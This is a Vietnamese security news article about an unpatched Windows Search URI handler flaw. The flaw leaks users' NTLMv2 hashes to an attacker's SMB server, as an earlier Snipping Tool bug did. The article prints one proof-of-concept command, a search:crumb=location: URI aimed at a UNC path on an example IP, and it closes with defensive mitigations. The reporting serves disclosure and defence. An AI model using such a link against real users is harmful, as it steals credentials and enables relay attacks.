Lỗ hổng Windows Search URI chưa được vá cho phép kẻ tấn công đánh cắp Hash NTLMv2

Các nhà nghiên cứu an ninh mạng đã tiết lộ chi tiết về một lỗ hổng chưa được vá trong trình xử lý Windows Search URI, có thể bị khai thác để đánh cắp hash NTLMv2 của người dùng. Tương tự như lỗ hổng CVE-2026-33829 trước đó, vấn đề này cho phép kẻ tấn công lừa người dùng kết nối với máy chủ SMB độc hại thông qua các liên kết được tạo đặc biệt.
Lỗ hổng Windows Search URI

Các nhà nghiên cứu an ninh mạng vừa tiết lộ chi tiết về một vấn đề chưa được vá có thể bị khai thác để làm lộ hash NTLMv2 của người dùng cho kẻ tấn công.

Theo Huntress, tương tự như trường hợp của CVE-2026-33829 - lỗ hổng ảnh hưởng đến trình xử lý URI ms-screensketch: của Windows Snipping Tool - vấn đề mới được báo cáo này nằm trong trình xử lý URI search:.

Tìm hiểu về CVE-2026-33829 và rò rỉ hash NTLM

CVE-2026-33829 đề cập đến một lỗ hổng giả mạo có thể tiết lộ thông tin nhạy cảm cho các tác nhân không được ủy quyền. Lỗ hổng này đã được Microsoft vá vào tháng 4 năm 2026.

"Kẻ tấn công có thể lừa người dùng nhấp vào một liên kết được tạo đặc biệt trong trình duyệt Web hoặc nguồn URL khác, bằng cách nhúng nó vào một trang Web hoặc thông báo email," Microsoft lưu ý trong bản tin tư vấn vào thời điểm đó.

"Nếu người dùng chấp thuận việc khởi chạy liên kết, URL được tạo có thể khiến máy tính kết nối với máy chủ SMB do kẻ tấn công chọn, điều này sẽ tiết lộ hash NTLMv2 của người dùng cho kẻ tấn công, người có thể sử dụng thông tin này để xác thực dưới danh nghĩa người dùng."

Cụ thể, vấn đề nằm ở việc trình xử lý URI của Snipping Tool chấp nhận tham số "filePath", nhưng không xác thực nó và sẽ kết nối tới bất kỳ đường dẫn Universal Naming Convention (UNC) nào được truyền vào. Điều này có thể kích hoạt quá trình xác thực NTLM và làm lộ hash Net-NTLMv2 của nạn nhân cho kẻ tấn công.

Lỗ hổng mới trong trình xử lý Search URI

Khiếm khuyết mới được phát hiện cũng đạt được mục đích tương tự bằng cách sử dụng search:crumb=location: thay vì filePath, thông qua một lệnh như dưới đây:

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

"Nó sử dụng cùng một cơ chế rò rỉ NTLM, tạo ra cùng một kiểu rò rỉ Net-NTLMv2, có cùng các điều kiện tiên quyết và mang cùng mức xếp hạng Trung bình (Moderate)," nhà nghiên cứu Andrew Schwartz của Huntress cho biết. Đáng chú ý là việc sử dụng tham số "crumb" để đánh cắp hash (CVE-2023-35636) đã từng được Varonis ghi nhận vào tháng 2 năm 2024.

Do đó, một tác nhân đe dọa có thể tận dụng hash thu thập được để thực hiện các cuộc tấn công relay attacks và xâm nhập sâu hơn vào mạng lưới. Sau khi được tiết lộ một cách có trách nhiệm vào ngày 15 tháng 4 năm 2026, Microsoft đã từ chối khắc phục vấn đề này, tuyên bố rằng "chỉ những trường hợp có mức độ nghiêm trọng Quan trọng (Important) và Nghiêm trọng (Critical) mới đáp ứng tiêu chuẩn để chúng tôi xử lý."

Các biện pháp phòng ngừa khuyến nghị

Trong trường hợp không có bản sửa lỗi chính thức, người dùng và quản trị viên được khuyến nghị:

  • Chặn lưu lượng SMB ra ngoài (TCP/445 và TCP/139) trên các máy chủ không thực sự cần thiết.
  • Thực thi SMB signing để các hash bị đánh cắp không thể được chuyển tiếp (relayed) chống lại các dịch vụ nội bộ.
  • Vô hiệu hóa NTLM ở những nơi có thể áp dụng.